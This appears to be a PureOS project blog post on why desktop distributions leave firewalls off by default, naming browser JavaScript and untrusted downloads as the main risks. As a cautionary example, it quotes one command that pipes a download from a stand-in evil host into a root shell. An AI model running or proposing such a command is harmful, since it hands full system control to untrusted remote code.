When deciding whether to use any particular security measure, it’s useful to understand what the threat is and how the security measure might address it. In the case of a firewall, the threat is usually from an attacker accessing or attacking a service over the network that is only intended for trusted IPs. So if you have a database server, you might use a firewall to limit access to particular IP address ranges on your internal network. You might block all but internally-routable IP addresses, just in case the database gets exposed to the bare Internet. Or you might forego using a firewall and focus your attention instead on strong authentication measures so only trusted, authenticated clients can talk to the database. Or you might do all of the above so you have defense in depth.
Most desktop distributions (like PureOS) do not enable a firewall by default because there is little value in it–these days there are usually no services running on the desktop distribution by default that are listening for incoming (ingress) connections that you would want to firewall off from the outside world. Most desktop distributions don’t even enable SSH by default. From the outside world, there is little for an attacker to attack over the network that a firewall would help with. While you could block outgoing connections, since the distribution doesn’t know what kind of services and networks you may want to connect to, it can’t effectively set up outgoing (or egress) firewall rules.
The main risk of attack on a desktop isn’t from an attacker accessing a web server, database, or other service running on the desktop (it normally wouldn’t be running any of these services). The main risk comes from the web browser, which is constantly downloading and executing untrusted javascript from every website you visit. The secondary risk comes from downloading and executing code from an untrusted source outside of the web browser, whether that’s from an email attachment or blindly following a “curl www.evilsite.evil/badcode | sudo sh” installation document online.
For the first risk, PureOS has offered Purebrowser in the past which enabled some privacy-enhancing extensions by default. Recently we started making the transition over to Epiphany both to align better with PureOS on the Librem 5, as well as to make it easier to sandbox webapps on the desktop, both with the native Epiphany features that make a site a web app, and ultimately by wrapping the browser in technology like bubblewrap.
The second risk is why we stress the importance of downloading and installing software from our trusted and signed PureOS repository and as we expand the “PureOS Store” we will do so with applications that are reproducibily built so you have an extra degree of safety when installing them.